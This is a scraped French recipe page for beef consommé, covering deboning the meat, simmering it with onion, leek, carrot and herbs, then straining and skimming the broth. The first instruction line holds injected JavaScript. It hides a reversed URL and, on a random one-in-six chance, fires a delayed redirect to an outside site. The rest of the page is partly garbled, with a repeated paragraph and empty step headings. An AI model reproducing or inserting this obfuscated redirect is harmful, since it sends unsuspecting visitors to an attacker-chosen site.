Consommé de bœuf
2021-05-07- Niveau : Facile
Désossez et ficeler la viande (comme la macreuse, gîte, paleron, jumeau, plat de côtes, queue.) Enveloppez l’os dans un tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torchon et les concasser avec un marteau
Ingrédients
Désossez et ficeler la viande (comme la macreuse, gîte, paleron, jumeau, plat de côtes, queue.) Enveloppez l’os dans un torchon et les concasser avec un marteau Déposez les viandes dans une marmite. Versez de l'eau froide et doit recouvrir la viande, salez. Portez à ébullition, écumez plusieurs fois.
Coupez l’oignon en deux, faites-le rissoler dans une petite casserole et faites cuire sur feu doux jusqu’à ce qu’il soit bien coloré.
Le retirer et piquez-le avec le clou de girofle, pelez le poireau et l’attacher avec le brin de thym, le céleri et la feuille de laurier.
Pelez la carotte et l’ail, incorporez-les dans la marmite. Portez à ébullition puis baissez la feu et faites cuire tout doucement pendant 3 heures 30 minute à découvert en écumant souvent. Passez le bouillon. Laissez-le refroidir. Enlevez la pellicule de gras sur la surface. Il est possible de le congeler.
Préparation de la recette
Etape 1
Etape 2
Etape 3
Etape 4
Etape 5
Etape 6
Etape 7
Etape 8
Etape 9
Etape 10
Etape 11
Etape 12
Note des membres
(0 / 5)
0 personne(s) ont noté cette recette